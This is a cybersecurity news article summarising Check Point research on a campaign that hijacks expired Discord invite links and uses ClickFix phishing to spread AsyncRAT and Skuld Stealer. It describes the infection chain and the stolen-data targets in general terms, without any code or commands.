A new malware campaign is exploiting Discord’s invite system to distribute AsyncRAT and a customized Skuld Stealer. Security researchers at Check Point revealed that threat actors hijacked expired or deleted vanity invite links to silently redirect users to fake servers under their control.
This technique abuses Discord’s inability to prevent the reuse of deleted or expired invite codes when creating custom links. Attackers leveraged this flaw to impersonate trusted servers previously shared on forums or communities.
Once redirected, users land on malicious Discord servers that mimic legitimate communities.
ClickFix Phishing Tricks Users into Executing Malware
The attackers used a social engineering method called ClickFix to trick victims into installing malware. After joining the rogue Discord server, users are asked to verify their identity by clicking a “Verify” button.
Algoritha: The Most Trusted Name in BFSI Investigations and DFIR Services
That button executes JavaScript, which copies a PowerShell command to the clipboard. Victims are then instructed to run the command via Windows Run dialog.
This command pulls a script from Pastebin that downloads a loader, eventually dropping both AsyncRAT and Skuld Stealer from remote servers hosted on Bitbucket and GitHub.
What the Malware Does
AsyncRAT allows full remote access and control over infected systems.
Skuld Stealer is a Golang-based info stealer designed to harvest data from browsers, gaming platforms, Discord, and cryptocurrency wallets.
The stealer specifically targets Exodus and Atomic wallets, extracting seed phrases and passwords using a wallet injection technique. It replaces app files with trojanized versions hosted on GitHub. The attackers also use ChromeKatz, a modified open-source tool, to bypass Chrome’s encryption and steal credentials.
FCRF x CERT-In Roll Out National Cyber Crisis Management Course to Prepare India’s Digital Defenders
Stolen data is exfiltrated via Discord webhooks, helping the campaign blend in with normal network traffic.
Wider Campaign and Global Impact
Check Point also discovered a parallel campaign run by the same actors. In that case, the malware was disguised as a tool for unlocking pirated games. This version was hosted on Bitbucket and downloaded over 350 times.
Victims of both campaigns were found primarily in the United States, Vietnam, France, Germany, Austria, Slovakia, the Netherlands, and the United Kingdom.
Discord has since disabled the malicious bot linked to these attacks, disrupting the infection chain.
About the author – Ayush Chaurasia is a postgraduate student passionate about cybersecurity, threat hunting, and global affairs. He explores the intersection of technology, psychology, national security, and geopolitics through insightful writing.